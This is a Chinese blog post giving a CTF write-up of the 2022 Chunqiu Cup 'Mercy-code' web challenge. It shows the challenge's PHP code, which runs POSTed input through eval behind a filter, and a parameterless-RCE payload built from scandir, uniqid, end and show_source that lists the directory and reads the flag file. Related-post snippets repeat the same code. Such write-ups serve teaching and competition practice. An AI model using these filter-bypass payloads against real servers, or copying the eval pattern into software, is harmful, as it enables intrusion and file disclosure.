2022年春秋杯网络安全联赛春季赛勇者山峰-Mercy-code[WEB]

最新推荐文章于 2024-07-20 15:20:17 发布
最新推荐文章于 2024-07-20 15:20:17 发布
阅读量1k 收藏 6
点赞数
分类专栏: Write Up 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Little_jcak/article/details/124637577
版权

Mercy-code

这道题参考这篇博客

打开环境,很明显的无参数rce类型的题

  • 思路一 读文件,一般是要构造 . … / 能改变目录,进行文件读取
  • 思路二 RCE,可以利用请求头里面的字段等传入命令
<?php
highlight_file(__FILE__);
if ($_POST['cmd']) {
    $cmd = $_POST['cmd'];
    if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) {
        if (preg_match('/file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log|var_dump|pos|current|array|time|se|ord/i', $cmd)) {
            die('What are you thinking?');
        } else {
            eval($cmd);
        }
    } else {
        die('Please calm down');
    }
}

过滤比较严格,通过两个脚本,找到所有内置函数,和可以使用的函数

<?php
$a = get_defined_functions()['internal'];
$file = fopen("function.txt","w+");
foreach ($a as $key ) {
 echo fputs($file,$key."\r\n");
}
fclose($file);
?>

另一个fuzz脚本参考这个博客,使用效果如下

在这里插入图片描述

找了很久能利用的函数,找到了uniqid(),这个函数前部分的内容是不变的,每次改变的是后面的内容,

  • strrev() 函数将字符串反转

  • chr 生成 . .. \ 这样字符

  • scandir() 返回目录

  • implode() 将一维数组转换成字符串

  • die() 结束进程,并输出内容,等同于 exit()

构造payload如下

cmd=die(implode(scandir(chr(strrev(uniqid())))));

然后就是通过burp连续发包,chr(uniqid())有几率生成 .

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CBy345II-1651921910024)(images/Ichunqiu_wp/image-20220507185931156.png)][外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qmzp3QMP-1651921975755)(images/Ichunqiu_wp/image-20220507185953887.png)]

然后就是读取文件,这里利用end()函数得到文件名

  • end() 将数组的内部指针指向最后一个单元
  • show_source() 语法高亮一个文件 highlight_file() 别名

用burp发包,可以看到有成功的

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zosTdyzg-1651921910025)(images/Ichunqiu_wp/image-20220507190336957.png)]

Y3pro
关注
专栏目录
2023春秋网络安全联赛春季Misc-AK
qq_43647197的博客
05-19 1561
2023春秋网络安全联赛春季Misc-AK
2022春秋网络安全联赛春季 勇者山峰部分WP
大雾
05-08 2411
Misc 签到 题目描述:题目内容:因为疫情,有多久没听到上课铃声了。 (如果你还不知道怎么签到,关注“春秋伽玛”公众号,回复“上课铃声”可以拿到进一步提示) 关注公众号回复上课铃声得到 照着按就完了 最终按对会出个弹框跳转到有flag的页面 flag{27033a89-55dd-46dc-82b9-cd89a4da957d} tiger 题目描述:无 从中可以发现因此: ag2a`f76 是 rot47 加密,解密为:28a217fe rot47解密 PNG 图片是 LSB 加密lsb解密工具 解.
2024春秋夏季Hijack_wp(详细讲解)
最新发布
DoNotShyDoIt的博客
07-20 1672
春秋2024
2022春秋网络安全联赛春季 勇者山峰
shinygod的博客
05-08 1386
Mercy-code if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd))这个过滤就代表了是无参rce。 <?php highlight_file(__FILE__); if ($_POST['cmd']) { $cmd = $_POST['cmd']; if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) { echo chr(strrev(un
2022春秋网络安全联赛春季勇者山峰密码部分wp
mxx307的博客
05-08 2724
2022春秋网络安全联赛春季勇者山峰部分wp Crypto bob’s enc bob自己编写了一套加密算法,但是在加密的过程中,似乎混入了一些噪音,你能帮助他恢复出明文吗? 题目 #python2 from secret import * import random prime = 2141 print len(flag) flag = map(ord, flag) flag1 = flag[:21] flag2 = flag[21:] row = 64 def add(msg1, msg
[i春秋]Mercy-code
Landasika的博客
05-15 587
Mercy-code(无参REC) 题目源码 <?php highlight_file(__FILE__); if ($_REQUEST['cmd']) { $cmd = $_REQUEST['cmd']; if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) { if(preg_match('/file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|path|
mission-of-mercy:慈悲使命免费牙科诊所的管理申请
05-31
项目状态更新 - 2019 9 月 在继续阅读之前,请参阅这篇关于项目当前状态及其未来的帖子: 适用于Mission of Mercy免费牙科诊所的诊所管理软件。 旨在简化诊所营业时间内的患者入院、数字 X 射线和结账流程。 自 ...
Mercy Overwatch Wallpapers and New Tab-crx插件
03-15
Mercy守望先锋高清壁纸和全新标签主题,带来最佳浏览体验 我们已经为《守望先锋》游戏的所有粉丝准备了此Mercy扩展程序。 它提供了完美品质的壁纸,将为您的浏览器带来全新的外观。 此外,它们将在您每次打开新标签...
Mars, Land of No Mercy-开源
04-27
回合制策略游戏,具有等距图形,原始情节,原始配乐等。 玩家带领一支雇佣队前往火星,并使用机甲和其他军车与不同派系作战。
基于Pioneer3-DX的盲人指导移动机器人项目:这是我于2017至2018在底特律Mercy大学所做的高级设计项目,该项目基于配备有Kinect2,Hokuyo的Pioneer3-DX机器人平台。 该项目得出的结论是,我在github中发现的一些开放式算法包含SLAM-gmapping,pocketsphinx等。 感谢提供者! 该机器人具有基本的映射和导航功能,并在仿真软件中具有附加模型,语音控制和语音反馈,通过坐标设置目标等。 最后,感谢我的团队成员郝岚,罗雨辰,苗迪文和沉五鑫。 我大致上载了
02-22
这是我于2017至2018在底特律Mercy大学进行的研究项目,该研究基于北约市Kinect2的Pioneer3-DX机器人平台。 该项目得出的结论是,我在github中发现的一些开放式算法包含SLAM-gmapping,pocketsphinx等。 感谢提供...
Mercy-Hill-Newsletter:解析 mailchimp 时事通讯以拍摄内容的各个部分的快照
07-08
假设你已经通过API或网络请求获取到了HTML字符串,你可以使用以下代码片段加载到HtmlDocument对象中: ```csharp using HtmlAgilityPack; // 假设htmlContent是时事通讯的HTML字符串 var doc = new HtmlDocument();...
2022春秋-春季 勇者山峰 writeup(misc全部+web签到)
ShenZ的博客
05-08 2953
2022春秋-春季 勇者山峰 writeup(misc全部+web签到) 1 Capture Radiate Chart 1.rar提取 查看图片,发现每个IDAT块的crc值最后两位 2.pdf分析 对pdf的结构分析,其中有一个78 9C开头的stream数据段,应该是里面有一张图片,所以对pdf进行strings 根据上面这段对象内容属性 1) png文件头 2) IDAT段 way2 2 RecoverMe 3 PINTU 4 tiger 5 被带走的机密文件 6 签到 7 Mercy-code
2022春秋网络安全联赛春季 勇者山峰部分WriteUp
Aluxian_的博客
05-09 2099
2022春秋网络安全联赛春季 勇者山峰部分WriteUp
春秋2022勇者山峰取证
wha1e的博客
05-11 522
春秋2022勇者山峰取证
【WP】2022 春秋 Write Up
woodwhale的博客
12-27 1229
2022春秋部分题目的个人wp
2021春秋网络安全联赛秋季 勇者山峰 misc部分wp
Demodd的博客
11-28 737
Crypto https://atomcated.github.io/Vigenere/ 无秘钥解密即可 MISC 问卷 flag{让我们一起带给世界安全感} helloshark bmp图片尾藏了一个压缩包,存在一个密码在图片中.txt zsteg -a 2-3.bmp 解密得到pcapng追踪tcp流发现flag(蓝色||$前的字符) flag{a4e0a418-fced-4b2d-9d76-fdc9053d69a1} secret_chart png藏了一个压缩包,但是加密,爆破 解密得到
2022春秋-春季-逆向题ezam分析
云舒的博客
05-10 620
准备工作 使用die查壳得到64位无壳,于是乎用ida 64打开,看到如下图所示: F5反汇编查看是一堆while语句和switch语句的组合,由此判断需要去控制流平坦化。 去控制流平坦化 这时需要用到angr。安装过程如下: #在windows里用 pip install angr #我自己试了试linux里安装用不了,当然你也可以尝试一下 #运行报错的话,就用windows安装叭,当然linux还有别的方法可以装,自己去找吧 然后需要用到两个脚本,脚本自己网上搜(控制流平坦化脚本),我就不留了。
2022春秋】两个题wp
weixin_51614272的博客
05-28 1068
Mercy-code 无参数RCE,过滤了很多 解法一 <?php highlight_file(__FILE__); if ($_POST['cmd']) { $cmd = $_POST['cmd']; if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) { if (preg_match('/file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|p
Web安全学习Week12
m0_59271033的博客
05-01 1540
新手入门Web安全
--snip--是什么
08-29
- *1* *2* [Python编程从入门到实践中的 --snip--](https://blog.csdn.net/frank_mercy/article/details/127708161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值